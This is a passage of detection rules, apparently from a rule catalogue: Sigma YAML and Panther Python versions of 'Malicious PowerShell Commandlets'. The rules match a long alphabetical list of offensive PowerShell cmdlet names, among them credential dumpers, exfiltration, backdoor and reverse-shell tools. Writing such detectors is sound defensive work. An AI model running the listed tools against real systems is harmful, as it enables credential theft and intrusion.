            "Veeam-Get-Creds" in event.deep_get("Payload", default=""),
            "VolumeShadowCopyTools" in event.deep_get("Payload", default=""),
        ]
    ):
        return True
    return False
view Sigma YAML
title: Malicious PowerShell Commandlets - PoshModule
id: 7d0d0329-0ef1-4e84-a9f5-49500f9d7c6c
related:
    - id: 89819aa4-bbd6-46bc-88ec-c7f7fe30efa6
      type: similar
    - id: 02030f2f-6199-49ec-b258-ea71b07e03dc
      type: similar
status: test
description: Detects Commandlet names from well-known PowerShell exploitation frameworks
references:
    - https://adsecurity.org/?p=2921
    - https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries
    - https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1
    - https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1
    - https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1
    - https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1
    - https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/ # Invoke-TotalExec
    - https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/ # Invoke-TotalExec
    - https://github.com/calebstewart/CVE-2021-1675 # Invoke-Nightmare
    - https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1
    - https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html
    - https://github.com/HarmJ0y/DAMP
    - https://github.com/samratashok/nishang
    - https://github.com/DarkCoderSc/PowerRunAsSystem/
    - https://github.com/besimorhino/powercat
    - https://github.com/Kevin-Robertson/Powermad
    - https://github.com/adrecon/ADRecon
    - https://github.com/adrecon/AzureADRecon
    - https://github.com/sadshade/veeam-creds/blob/6010eaf31ba41011b58d6af3950cffbf6f5cea32/Veeam-Get-Creds.ps1
    - https://github.com/The-Viper-One/Invoke-PowerDPAPI/
    - https://github.com/Arno0x/DNSExfiltrator/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-01-20
modified: 2025-12-10
tags:
    - attack.execution
    - attack.discovery
    - attack.t1482
    - attack.t1087
    - attack.t1087.001
    - attack.t1087.002
    - attack.t1069.001
    - attack.t1069.002
    - attack.t1069
    - attack.t1059.001
logsource:
    product: windows
    category: ps_module
    definition: 0ad03ef1-f21b-4a79-8ce8-e6900c54b65b
detection:
    selection:
        Payload|contains:
            # Note: Please ensure alphabetical order when adding new entries
            - 'Add-Exfiltration'
            - 'Add-Persistence'
            - 'Add-RegBackdoor'
            - 'Add-RemoteRegBackdoor'
            - 'Add-ScrnSaveBackdoor'
            - 'BadSuccessor'
            - 'Check-VM'
            - 'ConvertTo-Rc4ByteStream'
            - 'Decrypt-Hash'
            - 'Disable-ADIDNSNode'
            - 'Disable-MachineAccount'
            - 'Do-Exfiltration'
            - 'Enable-ADIDNSNode'
            - 'Enable-MachineAccount'
            - 'Enabled-DuplicateToken'
            - 'Exploit-Jboss'
            - 'Export-ADR' # # ADRecon related cmdlets
            - 'Export-ADRCSV' # # ADRecon related cmdlets
            - 'Export-ADRExcel' # # ADRecon related cmdlets
            - 'Export-ADRHTML' # # ADRecon related cmdlets
            - 'Export-ADRJSON' # # ADRecon related cmdlets
            - 'Export-ADRXML' # # ADRecon related cmdlets
            - 'Find-Fruit'
            - 'Find-GPOLocation'
            - 'Find-TrustedDocuments'
            - 'Get-ADIDNS' # Covers: Get-ADIDNSNodeAttribute, Get-ADIDNSNodeOwner, Get-ADIDNSNodeTombstoned, Get-ADIDNSPermission, Get-ADIDNSZone
            - 'Get-ApplicationHost'
            - 'Get-ChromeDump'
            - 'Get-ClipboardContents'
            - 'Get-FoxDump'
            - 'Get-GPPPassword'
            - 'Get-IndexedItem'
            - 'Get-KerberosAESKey'
            - 'Get-Keystrokes'
            - 'Get-LSASecret'
            - 'Get-MachineAccountAttribute'
            - 'Get-MachineAccountCreator'
            - 'Get-PassHashes'
            - 'Get-RegAlwaysInstallElevated'
            - 'Get-RegAutoLogon'
            - 'Get-RemoteBootKey'
            - 'Get-RemoteCachedCredential'
            - 'Get-RemoteLocalAccountHash'
            - 'Get-RemoteLSAKey'
            - 'Get-RemoteMachineAccountHash'
            - 'Get-RemoteNLKMKey'
            - 'Get-RickAstley'
            - 'Get-Screenshot'
            - 'Get-SecurityPackages'
            - 'Get-ServiceFilePermission'
            - 'Get-ServicePermission'
            - 'Get-ServiceUnquoted'
            - 'Get-SiteListPassword'
            - 'Get-System'
            - 'Get-TimedScreenshot'
            - 'Get-UnattendedInstallFile'
            - 'Get-Unconstrained'
            - 'Get-USBKeystrokes'
            - 'Get-VaultCredential'
            - 'Get-VulnAutoRun'
            - 'Get-VulnSchTask'
            - 'Grant-ADIDNSPermission'
            - 'Gupt-Backdoor'
            - 'HTTP-Login'
            - 'Install-ServiceBinary'
            - 'Install-SSP'
            - 'Invoke-ACLScanner'
            - 'Invoke-ADRecon' # # ADRecon related cmdlets
            - 'Invoke-ADSBackdoor'
            - 'Invoke-AgentSmith'
            - 'Invoke-AllChecks'
            - 'Invoke-ARPScan'
            - 'Invoke-AzureHound'
            - 'Invoke-BackdoorLNK'
            - 'Invoke-BadPotato'
            - 'Invoke-BetterSafetyKatz'
            - 'Invoke-BypassUAC'
            - 'Invoke-Carbuncle'
            - 'Invoke-Certify'
            - 'Invoke-ConPtyShell'
            - 'Invoke-CredentialInjection'
            - 'Invoke-DAFT'
            - 'Invoke-DCSync'
            - 'Invoke-DinvokeKatz'
            - 'Invoke-DllInjection'
            - 'Invoke-DNSUpdate'
            - 'Invoke-DNSExfiltrator'
            - 'Invoke-DomainPasswordSpray'
            - 'Invoke-DowngradeAccount'
            - 'Invoke-EgressCheck'
            - 'Invoke-Eyewitness'
            - 'Invoke-FakeLogonScreen'
            - 'Invoke-Farmer'
            - 'Invoke-Get-RBCD-Threaded'
            - 'Invoke-Gopher'
            - 'Invoke-Grouper' # Also Covers Invoke-GrouperX
            - 'Invoke-HandleKatz'
            - 'Invoke-ImpersonatedProcess'
            - 'Invoke-ImpersonateSystem'
            - 'Invoke-InteractiveSystemPowerShell'
            - 'Invoke-Internalmonologue'
            - 'Invoke-Inveigh'
            - 'Invoke-InveighRelay'
            - 'Invoke-KrbRelay'
            - 'Invoke-LdapSignCheck'
            - 'Invoke-Lockless'
            - 'Invoke-MalSCCM'
            - 'Invoke-Mimikatz'
            - 'Invoke-Mimikittenz'
            - 'Invoke-MITM6'
            - 'Invoke-NanoDump'
            - 'Invoke-NetRipper'
            - 'Invoke-Nightmare'
            - 'Invoke-NinjaCopy'
            - 'Invoke-OfficeScrape'
            - 'Invoke-OxidResolver'
            - 'Invoke-P0wnedshell'
            - 'Invoke-Paranoia'
            - 'Invoke-PortScan'
            - 'Invoke-PoshRatHttp' # Also Covers Invoke-PoshRatHttps
            - 'Invoke-PostExfil'
            - 'Invoke-PowerDump'
            - 'Invoke-PowerDPAPI'
            - 'Invoke-PowerShellTCP'
            - 'Invoke-PowerShellWMI'
            - 'Invoke-PPLDump'
            - 'Invoke-PsExec'
            - 'Invoke-PSInject'
            - 'Invoke-PsUaCme'
            - 'Invoke-ReflectivePEInjection'
            - 'Invoke-ReverseDNSLookup'
            - 'Invoke-Rubeus'
            - 'Invoke-RunAs'
            - 'Invoke-SafetyKatz'
            - 'Invoke-SauronEye'
            - 'Invoke-SCShell'
            - 'Invoke-Seatbelt'
            - 'Invoke-ServiceAbuse'
            - 'Invoke-ShadowSpray'
            - 'Invoke-Sharp' # Covers all "Invoke-Sharp" variants
            - 'Invoke-Shellcode'
            - 'Invoke-SMBScanner'
            - 'Invoke-Snaffler'
            - 'Invoke-Spoolsample'
            - 'Invoke-SpraySinglePassword'
            - 'Invoke-SSHCommand'
            - 'Invoke-StandIn'
            - 'Invoke-StickyNotesExtract'
            - 'Invoke-SystemCommand'
            - 'Invoke-Tasksbackdoor'
            - 'Invoke-Tater'
            - 'Invoke-Thunderfox'
            - 'Invoke-ThunderStruck'
            - 'Invoke-TokenManipulation'
            - 'Invoke-Tokenvator'
            - 'Invoke-TotalExec'
            - 'Invoke-UrbanBishop'
            - 'Invoke-UserHunter'
            - 'Invoke-VoiceTroll'
            - 'Invoke-Whisker'
            - 'Invoke-WinEnum'
            - 'Invoke-winPEAS'
            - 'Invoke-WireTap'
            - 'Invoke-WmiCommand'
            - 'Invoke-WMIExec'
            - 'Invoke-WScriptBypassUAC'
            - 'Invoke-Zerologon'
            - 'MailRaider'
            - 'New-ADIDNSNode'
            - 'New-DNSRecordArray'
            - 'New-HoneyHash'
            - 'New-InMemoryModule'
            - 'New-MachineAccount'
            - 'New-SOASerialNumberArray'
            - 'Out-Minidump'
            - 'Port-Scan'
            - 'PowerBreach'
            - 'powercat '
            - 'PowerUp'
            - 'PowerView'
            - 'Remove-ADIDNSNode'
            - 'Remove-MachineAccount'
            - 'Remove-Update'
            - 'Rename-ADIDNSNode'
            - 'Revoke-ADIDNSPermission'
            - 'Set-ADIDNSNode' # Covers: Set-ADIDNSNodeAttribute, Set-ADIDNSNodeOwner
            - 'Set-MacAttribute'
            - 'Set-MachineAccountAttribute'
            - 'Set-Wallpaper'
            - 'Show-TargetScreen'
            - 'Start-CaptureServer'
            - 'Start-Dnscat2'
            - 'Start-WebcamRecorder'
            - 'Veeam-Get-Creds'
            - 'VolumeShadowCopyTools'
    condition: selection
falsepositives:
    - Unknown
level: high
high
Malicious PowerShell Commandlets - ProcessCreation
Detects Commandlet names from well-known PowerShell exploitation frameworks
status test author Nasreddine Bencherchali (Nextron Systems) id 02030f2f-6199-49ec-b258-ea71b07e03dc
panther query
def rule(event):
    if any(
        [
            "Add-Exfiltration" in event.deep_get("CommandLine", default=""),
            "Add-Persistence" in event.deep_get("CommandLine", default=""),
            "Add-RegBackdoor" in event.deep_get("CommandLine", default=""),
            "Add-RemoteRegBackdoor" in event.deep_get("CommandLine", default=""),
            "Add-ScrnSaveBackdoor" in event.deep_get("CommandLine", default=""),
            "Check-VM" in event.deep_get("CommandLine", default=""),
            "ConvertTo-Rc4ByteStream" in event.deep_get("CommandLine", default=""),
            "Decrypt-Hash" in event.deep_get("CommandLine", default=""),
            "Disable-ADIDNSNode" in event.deep_get("CommandLine", default=""),
            "Disable-MachineAccount" in event.deep_get("CommandLine", default=""),
            "Do-Exfiltration" in event.deep_get("CommandLine", default=""),
            "Enable-ADIDNSNode" in event.deep_get("CommandLine", default=""),
            "Enable-MachineAccount" in event.deep_get("CommandLine", default=""),
            "Enabled-DuplicateToken" in event.deep_get("CommandLine", default=""),
            "Exploit-Jboss" in event.deep_get("CommandLine", default=""),
            "Export-ADR" in event.deep_get("CommandLine", default=""),
            "Export-ADRCSV" in event.deep_get("CommandLine", default=""),
            "Export-ADRExcel" in event.deep_get("CommandLine", default=""),
            "Export-ADRHTML" in event.deep_get("CommandLine", default=""),
            "Export-ADRJSON" in event.deep_get("CommandLine", default=""),
            "Export-ADRXML" in event.deep_get("CommandLine", default=""),
            "Find-Fruit" in event.deep_get("CommandLine", default=""),
            "Find-GPOLocation" in event.deep_get("CommandLine", default=""),
            "Find-TrustedDocuments" in event.deep_get("CommandLine", default=""),
            "Get-ADIDNS" in event.deep_get("CommandLine", default=""),
            "Get-ApplicationHost" in event.deep_get("CommandLine", default=""),
            "Get-ChromeDump" in event.deep_get("CommandLine", default=""),
            "Get-ClipboardContents" in event.deep_get("CommandLine", default=""),
            "Get-FoxDump" in event.deep_get("CommandLine", default=""),
            "Get-GPPPassword" in event.deep_get("CommandLine", default=""),
            "Get-IndexedItem" in event.deep_get("CommandLine", default=""),
            "Get-KerberosAESKey" in event.deep_get("CommandLine", default=""),
            "Get-Keystrokes" in event.deep_get("CommandLine", default=""),
            "Get-LSASecret" in event.deep_get("CommandLine", default=""),
            "Get-MachineAccountAttribute" in event.deep_get("CommandLine", default=""),
            "Get-MachineAccountCreator" in event.deep_get("CommandLine", default=""),
            "Get-PassHashes" in event.deep_get("CommandLine", default=""),
            "Get-RegAlwaysInstallElevated" in event.deep_get("CommandLine", default=""),
            "Get-RegAutoLogon" in event.deep_get("CommandLine", default=""),
            "Get-RemoteBootKey" in event.deep_get("CommandLine", default=""),
            "Get-RemoteCachedCredential" in event.deep_get("CommandLine", default=""),
            "Get-RemoteLocalAccountHash" in event.deep_get("CommandLine", default=""),
            "Get-RemoteLSAKey" in event.deep_get("CommandLine", default=""),
            "Get-RemoteMachineAccountHash" in event.deep_get("CommandLine", default=""),
            "Get-RemoteNLKMKey" in event.deep_get("CommandLine", default=""),
            "Get-RickAstley" in event.deep_get("CommandLine", default=""),
            "Get-Screenshot" in event.deep_get("CommandLine", default=""),
            "Get-SecurityPackages" in event.deep_get("CommandLine", default=""),
            "Get-ServiceFilePermission" in event.deep_get("CommandLine", default=""),
            "Get-ServicePermission" in event.deep_get("CommandLine", default=""),
            "Get-ServiceUnquoted" in event.deep_get("CommandLine", default=""),
            "Get-SiteListPassword" in event.deep_get("CommandLine", default=""),
            "Get-System" in event.deep_get("CommandLine", default=""),
            "Get-TimedScreenshot" in event.deep_get("CommandLine", default=""),
            "Get-UnattendedInstallFile" in event.deep_get("CommandLine", default=""),
            "Get-Unconstrained" in event.deep_get("CommandLine", default=""),
            "Get-USBKeystrokes" in event.deep_get("CommandLine", default=""),
            "Get-VaultCredential" in event.deep_get("CommandLine", default=""),
            "Get-VulnAutoRun" in event.deep_get("CommandLine", default=""),
            "Get-VulnSchTask" in event.deep_get("CommandLine", default=""),
            "Grant-ADIDNSPermission" in event.deep_get("CommandLine", default=""),
            "Gupt-Backdoor" in event.deep_get("CommandLine", default=""),
            "HTTP-Login" in event.deep_get("CommandLine", default=""),
            "Install-ServiceBinary" in event.deep_get("CommandLine", default=""),
            "Install-SSP" in event.deep_get("CommandLine", default=""),
            "Invoke-ACLScanner" in event.deep_get("CommandLine", default=""),
            "Invoke-ADRecon" in event.deep_get("CommandLine", default=""),
            "Invoke-ADSBackdoor" in event.deep_get("CommandLine", default=""),
            "Invoke-AgentSmith" in event.deep_get("CommandLine", default=""),
            "Invoke-AllChecks" in event.deep_get("CommandLine", default=""),
            "Invoke-ARPScan" in event.deep_get("CommandLine", default=""),
            "Invoke-AzureHound" in event.deep_get("CommandLine", default=""),
            "Invoke-BackdoorLNK" in event.deep_get("CommandLine", default=""),
            "Invoke-BadPotato" in event.deep_get("CommandLine", default=""),
            "Invoke-BetterSafetyKatz" in event.deep_get("CommandLine", default=""),
            "Invoke-BypassUAC" in event.deep_get("CommandLine", default=""),
            "Invoke-Carbuncle" in event.deep_get("CommandLine", default=""),
            "Invoke-Certify" in event.deep_get("CommandLine", default=""),
            "Invoke-ConPtyShell" in event.deep_get("CommandLine", default=""),
            "Invoke-CredentialInjection" in event.deep_get("CommandLine", default=""),
            "Invoke-DAFT" in event.deep_get("CommandLine", default=""),
            "Invoke-DCSync" in event.deep_get("CommandLine", default=""),
            "Invoke-DinvokeKatz" in event.deep_get("CommandLine", default=""),
            "Invoke-DllInjection" in event.deep_get("CommandLine", default=""),
            "Invoke-DNSUpdate" in event.deep_get("CommandLine", default=""),
            "Invoke-DNSExfiltrator" in event.deep_get("CommandLine", default=""),
            "Invoke-DomainPasswordSpray" in event.deep_get("CommandLine", default=""),
            "Invoke-DowngradeAccount" in event.deep_get("CommandLine", default=""),
            "Invoke-EgressCheck" in event.deep_get("CommandLine", default=""),
            "Invoke-Eyewitness" in event.deep_get("CommandLine", default=""),
            "Invoke-FakeLogonScreen" in event.deep_get("CommandLine", default=""),
            "Invoke-Farmer" in event.deep_get("CommandLine", default=""),
            "Invoke-Get-RBCD-Threaded" in event.deep_get("CommandLine", default=""),
            "Invoke-Gopher" in event.deep_get("CommandLine", default=""),
            "Invoke-Grouper" in event.deep_get("CommandLine", default=""),
            "Invoke-HandleKatz" in event.deep_get("CommandLine", default=""),
            "Invoke-ImpersonatedProcess" in event.deep_get("CommandLine", default=""),
            "Invoke-ImpersonateSystem" in event.deep_get("CommandLine", default=""),
            "Invoke-InteractiveSystemPowerShell" in event.deep_get("CommandLine", default=""),
            "Invoke-Internalmonologue" in event.deep_get("CommandLine", default=""),
            "Invoke-Inveigh" in event.deep_get("CommandLine", default=""),
            "Invoke-InveighRelay" in event.deep_get("CommandLine", default=""),
            "Invoke-KrbRelay" in event.deep_get("CommandLine", default=""),
            "Invoke-LdapSignCheck" in event.deep_get("CommandLine", default=""),
            "Invoke-Lockless" in event.deep_get("CommandLine", default=""),
            "Invoke-MalSCCM" in event.deep_get("CommandLine", default=""),
            "Invoke-Mimikatz" in event.deep_get("CommandLine", default=""),
            "Invoke-Mimikittenz" in event.deep_get("CommandLine", default=""),
            "Invoke-MITM6" in event.deep_get("CommandLine", default=""),
            "Invoke-NanoDump" in event.deep_get("CommandLine", default=""),
            "Invoke-NetRipper" in event.deep_get("CommandLine", default=""),
            "Invoke-Nightmare" in event.deep_get("CommandLine", default=""),
            "Invoke-NinjaCopy" in event.deep_get("CommandLine", default=""),
            "Invoke-OfficeScrape" in event.deep_get("CommandLine", default=""),
            "Invoke-OxidResolver" in event.deep_get("CommandLine", default=""),
            "Invoke-P0wnedshell" in event.deep_get("CommandLine", default=""),
            "Invoke-Paranoia" in event.deep_get("CommandLine", default=""),
            "Invoke-PortScan" in event.deep_get("CommandLine", default=""),
            "Invoke-PoshRatHttp" in event.deep_get("CommandLine", default=""),
            "Invoke-PostExfil" in event.deep_get("CommandLine", default=""),
            "Invoke-PowerDump" in event.deep_get("CommandLine", default=""),
            "Invoke-PowerDPAPI" in event.deep_get("CommandLine", default=""),
            "Invoke-PowerShellTCP" in event.deep_get("CommandLine", default=""),
            "Invoke-PowerShellWMI" in event.deep_get("CommandLine", default=""),
            "Invoke-PPLDump" in event.deep_get("CommandLine", default=""),
            "Invoke-PsExec" in event.deep_get("CommandLine", default=""),
            "Invoke-PSInject" in event.deep_get("CommandLine", default=""),
            "Invoke-PsUaCme" in event.deep_get("CommandLine", default=""),
            "Invoke-ReflectivePEInjection" in event.deep_get("CommandLine", default=""),
            "Invoke-ReverseDNSLookup" in event.deep_get("CommandLine", default=""),
            "Invoke-Rubeus" in event.deep_get("CommandLine", default=""),
            "Invoke-RunAs" in event.deep_get("CommandLine", default=""),
            "Invoke-SafetyKatz" in event.deep_get("CommandLine", default=""),
            "Invoke-SauronEye" in event.deep_get("CommandLine", default=""),
            "Invoke-SCShell" in event.deep_get("CommandLine", default=""),
            "Invoke-Seatbelt" in event.deep_get("CommandLine", default=""),
            "Invoke-ServiceAbuse" in event.deep_get("CommandLine", default=""),
            "Invoke-ShadowSpray" in event.deep_get("CommandLine", default=""),
            "Invoke-Sharp" in event.deep_get("CommandLine", default=""),
            "Invoke-Shellcode" in event.deep_get("CommandLine", default=""),
            "Invoke-SMBScanner" in event.deep_get("CommandLine", default=""),
            "Invoke-Snaffler" in event.deep_get("CommandLine", default=""),
            "Invoke-Spoolsample" in event.deep_get("CommandLine", default=""),
            "Invoke-SpraySinglePassword" in event.deep_get("CommandLine", default=""),
            "Invoke-SSHCommand" in event.deep_get("CommandLine", default=""),
            "Invoke-StandIn" in event.deep_get("CommandLine", default=""),
            "Invoke-StickyNotesExtract" in event.deep_get("CommandLine", default=""),
            "Invoke-SystemCommand" in event.deep_get("CommandLine", default=""),
            "Invoke-Tasksbackdoor" in event.deep_get("CommandLine", default=""),
            "Invoke-Tater" in event.deep_get("CommandLine", default=""),
            "Invoke-Thunderfox" in event.deep_get("CommandLine", default=""),
            "Invoke-ThunderStruck" in event.deep_get("CommandLine", default=""),
            "Invoke-TokenManipulation" in event.deep_get("CommandLine", default=""),
            "Invoke-Tokenvator" in event.deep_get("CommandLine", default=""),
            "Invoke-TotalExec" in event.deep_get("CommandLine", default=""),
            "Invoke-UrbanBishop" in event.deep_get("CommandLine", default=""),
            "Invoke-UserHunter" in event.deep_get("CommandLine", default=""),
            "Invoke-VoiceTroll" in event.deep_get("CommandLine", default=""),
            "Invoke-Whisker" in event.deep_get("CommandLine", default=""),
            "Invoke-WinEnum" in event.deep_get("CommandLine", default=""),
            "Invoke-winPEAS" in event.deep_get("CommandLine", default=""),
            "Invoke-WireTap" in event.deep_get("CommandLine", default=""),
            "Invoke-WmiCommand" in event.deep_get("CommandLine", default=""),
            "Invoke-WMIExec" in event.deep_get("CommandLine", default=""),
            "Invoke-WScriptBypassUAC" in event.deep_get("CommandLine", default=""),
            "Invoke-Zerologon" in event.deep_get("CommandLine", default=""),
            "MailRaider" in event.deep_get("CommandLine", default=""),
            "New-ADIDNSNode" in event.deep_get("CommandLine", default=""),
            "New-DNSRecordArray" in event.deep_get("CommandLine", default=""),
            "New-HoneyHash" in event.deep_get("CommandLine", default=""),
            "New-InMemoryModule" in event.deep_get("CommandLine", default=""),
            "New-MachineAccount" in event.deep_get("CommandLine", default=""),
            "New-SOASerialNumberArray" in event.deep_get("CommandLine", default=""),
            "Out-Minidump" in event.deep_get("CommandLine", default=""),
            "Port-Scan" in event.deep_get("CommandLine", default=""),
            "PowerBreach" in event.deep_get("CommandLine", default=""),
            "powercat " in event.deep_get("CommandLine", default=""),
            "PowerUp" in event.deep_get("CommandLine", default=""),
            "PowerView" in event.deep_get("CommandLine", default=""),
            "Remove-ADIDNSNode" in event.deep_get("CommandLine", default=""),
            "Remove-MachineAccount" in event.deep_get("CommandLine", default=""),
            "Remove-Update" in event.deep_get("CommandLine", default=""),
            "Rename-ADIDNSNode" in event.deep_get("CommandLine", default=""),
            "Revoke-ADIDNSPermission" in event.deep_get("CommandLine", default=""),
            "Set-ADIDNSNode" in event.deep_get("CommandLine", default=""),
            "Set-MacAttribute" in event.deep_get("CommandLine", default=""),
            "Set-MachineAccountAttribute" in event.deep_get("CommandLine", default=""),
            "Set-Wallpaper" in event.deep_get("CommandLine", default=""),
            "Show-TargetScreen" in event.deep_get("CommandLine", default=""),
            "Start-CaptureServer" in event.deep_get("CommandLine", default=""),
            "Start-Dnscat2" in event.deep_get("CommandLine", default=""),
            "Start-WebcamRecorder" in event.deep_get("CommandLine", default=""),
            "Veeam-Get-Creds" in event.deep_get("CommandLine", default=""),
            "VolumeShadowCopyTools" in event.deep_get("CommandLine", default=""),
        ]
    ):
        return True
    return False
view Sigma YAML
title: Malicious PowerShell Commandlets - ProcessCreation
id: 02030f2f-6199-49ec-b258-ea71b07e03dc
related:
    - id: 89819aa4-bbd6-46bc-88ec-c7f7fe30efa6
      type: derived
    - id: 7d0d0329-0ef1-4e84-a9f5-49500f9d7c6c
      type: similar
status: test
description: Detects Commandlet names from well-known PowerShell exploitation frameworks
references:
    - https://adsecurity.org/?p=2921
    - https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries
    - https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1
    - https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1
    - https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1
    - https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1
    - https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/ # Invoke-TotalExec
    - https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/ # Invoke-TotalExec
    - https://github.com/calebstewart/CVE-2021-1675 # Invoke-Nightmare
    - https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1
    - https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html
    - https://github.com/HarmJ0y/DAMP
    - https://github.com/samratashok/nishang
    - https://github.com/DarkCoderSc/PowerRunAsSystem/
    - https://github.com/besimorhino/powercat
    - https://github.com/Kevin-Robertson/Powermad
    - https://github.com/adrecon/ADRecon
    - https://github.com/adrecon/AzureADRecon
    - https://github.com/sadshade/veeam-creds/blob/6010eaf31ba41011b58d6af3950cffbf6f5cea32/Veeam-Get-Creds.ps1
    - https://github.com/The-Viper-One/Invoke-PowerDPAPI/
    - https://github.com/Arno0x/DNSExfiltrator/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-01-02
modified: 2025-12-10
tags:
    - attack.execution
    - attack.discovery
    - attack.t1482
    - attack.t1087
    - attack.t1087.001
    - attack.t1087.002
    - attack.t1069.001
    - attack.t1069.002
    - attack.t1069
    - attack.t1059.001
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        # Note: Please ensure alphabetical order when adding new entries
        CommandLine|contains:
            - 'Add-Exfiltration'
            - 'Add-Persistence'
            - 'Add-RegBackdoor'
            - 'Add-RemoteRegBackdoor'
            - 'Add-ScrnSaveBackdoor'
            - 'Check-VM'
            - 'ConvertTo-Rc4ByteStream'
            - 'Decrypt-Hash'
            - 'Disable-ADIDNSNode'
            - 'Disable-MachineAccount'
            - 'Do-Exfiltration'
            - 'Enable-ADIDNSNode'
            - 'Enable-MachineAccount'
            - 'Enabled-DuplicateToken'
            - 'Exploit-Jboss'
            - 'Export-ADR'
            - 'Export-ADRCSV'
            - 'Export-ADRExcel'
            - 'Export-ADRHTML'
            - 'Export-ADRJSON'
            - 'Export-ADRXML'
            - 'Find-Fruit'
            - 'Find-GPOLocation'
            - 'Find-TrustedDocuments'
            - 'Get-ADIDNS' # Covers: Get-ADIDNSNodeAttribute, Get-ADIDNSNodeOwner, Get-ADIDNSNodeTombstoned, Get-ADIDNSPermission, Get-ADIDNSZone
            - 'Get-ApplicationHost'
            - 'Get-ChromeDump'
            - 'Get-ClipboardContents'
            - 'Get-FoxDump'
            - 'Get-GPPPassword'
            - 'Get-IndexedItem'
            - 'Get-KerberosAESKey'
            - 'Get-Keystrokes'
            - 'Get-LSASecret'
            - 'Get-MachineAccountAttribute'
            - 'Get-MachineAccountCreator'
            - 'Get-PassHashes'
            - 'Get-RegAlwaysInstallElevated'
            - 'Get-RegAutoLogon'
            - 'Get-RemoteBootKey'
            - 'Get-RemoteCachedCredential'
            - 'Get-RemoteLocalAccountHash'
            - 'Get-RemoteLSAKey'
            - 'Get-RemoteMachineAccountHash'
            - 'Get-RemoteNLKMKey'
            - 'Get-RickAstley'
            - 'Get-Screenshot'
            - 'Get-SecurityPackages'
            - 'Get-ServiceFilePermission'
            - 'Get-ServicePermission'
            - 'Get-ServiceUnquoted'
            - 'Get-SiteListPassword'
            - 'Get-System'
            - 'Get-TimedScreenshot'
            - 'Get-UnattendedInstallFile'
            - 'Get-Unconstrained'
            - 'Get-USBKeystrokes'
            - 'Get-VaultCredential'
            - 'Get-VulnAutoRun'
            - 'Get-VulnSchTask'
            - 'Grant-ADIDNSPermission'
            - 'Gupt-Backdoor'
            - 'HTTP-Login'
            - 'Install-ServiceBinary'
            - 'Install-SSP'
            - 'Invoke-ACLScanner'
            - 'Invoke-ADRecon'
            - 'Invoke-ADSBackdoor'
            - 'Invoke-AgentSmith'
            - 'Invoke-AllChecks'
            - 'Invoke-ARPScan'
            - 'Invoke-AzureHound'
            - 'Invoke-BackdoorLNK'
            - 'Invoke-BadPotato'
            - 'Invoke-BetterSafetyKatz'
            - 'Invoke-BypassUAC'
            - 'Invoke-Carbuncle'
            - 'Invoke-Certify'
            - 'Invoke-ConPtyShell'
            - 'Invoke-CredentialInjection'
            - 'Invoke-DAFT'
            - 'Invoke-DCSync'
            - 'Invoke-DinvokeKatz'
            - 'Invoke-DllInjection'
            - 'Invoke-DNSUpdate'
            - 'Invoke-DNSExfiltrator'
            - 'Invoke-DomainPasswordSpray'
            - 'Invoke-DowngradeAccount'
            - 'Invoke-EgressCheck'
            - 'Invoke-Eyewitness'
            - 'Invoke-FakeLogonScreen'
            - 'Invoke-Farmer'
            - 'Invoke-Get-RBCD-Threaded'
            - 'Invoke-Gopher'
            - 'Invoke-Grouper' # Also Covers Invoke-GrouperX
            - 'Invoke-HandleKatz'
            - 'Invoke-ImpersonatedProcess'
            - 'Invoke-ImpersonateSystem'
            - 'Invoke-InteractiveSystemPowerShell'
            - 'Invoke-Internalmonologue'
            - 'Invoke-Inveigh'
            - 'Invoke-InveighRelay'
            - 'Invoke-KrbRelay'
            - 'Invoke-LdapSignCheck'
            - 'Invoke-Lockless'
            - 'Invoke-MalSCCM'
            - 'Invoke-Mimikatz'
            - 'Invoke-Mimikittenz'
            - 'Invoke-MITM6'
            - 'Invoke-NanoDump'
            - 'Invoke-NetRipper'
            - 'Invoke-Nightmare'
            - 'Invoke-NinjaCopy'
            - 'Invoke-OfficeScrape'
            - 'Invoke-OxidResolver'
            - 'Invoke-P0wnedshell'
            - 'Invoke-Paranoia'
            - 'Invoke-PortScan'
            - 'Invoke-PoshRatHttp' # Also Covers Invoke-PoshRatHttps
            - 'Invoke-PostExfil'
            - 'Invoke-PowerDump'
            - 'Invoke-PowerDPAPI'
            - 'Invoke-PowerShellTCP'
            - 'Invoke-PowerShellWMI'
            - 'Invoke-PPLDump'
            - 'Invoke-PsExec'
            - 'Invoke-PSInject'
            - 'Invoke-PsUaCme'
            - 'Invoke-ReflectivePEInjection'
            - 'Invoke-ReverseDNSLookup'
            - 'Invoke-Rubeus'
            - 'Invoke-RunAs'
            - 'Invoke-SafetyKatz'
            - 'Invoke-SauronEye'
            - 'Invoke-SCShell'
            - 'Invoke-Seatbelt'
